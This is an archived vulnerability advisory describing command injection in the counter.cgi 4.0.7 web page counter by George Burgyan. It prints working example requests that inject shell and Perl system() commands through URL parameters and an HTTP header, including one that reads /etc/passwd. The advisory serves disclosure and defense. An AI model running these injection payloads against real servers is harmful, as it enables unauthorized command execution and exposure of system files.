Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Adminware, Control Panels :: httpd88.htm

Counter.cgi 4.0.7 execute arbitrary code



Vulnerability

    counter.cgi

Affected

    CGI counter 4.0.7 by George Burgyan

Description

    Howard M.  Kash III  found following.   The popular  CGI web  page
    access counter  version 4.0.7  by George  Burgyan allows execution
    of arbitrary commands due to  unchecked user input.  Commands  are
    executed with the  same privilege as  the web server.   Of course,
    other exploits can be used to get root access on an unpatched OS.

    The  counter  consists  of  a  perl  script  called "counter", and
    multiple  links  to  counter  called  counter-ord,  counterfiglet,
    counterfiglet-ord,  counterbanner,  and  counterbanner-ord.    The
    following examples illustrate how they can be exploited:

        Using straight URL: http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
        Passing commands in a variable:
         > telnet web-server www
         GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
         X: pwd;ls -la /etc;cat /etc/passwd

         > telnet web-server www
         GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
         X: echo;id;uname -a;w

Solution

    The counter  was last  updated in  1995 so  is probably  no longer
    supported.   Links and  email addresses  referenced in  the source
    code are no longer valid.  However, it appears to still be  widely
    used based on the number  of references returned by search  engine
    queries.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH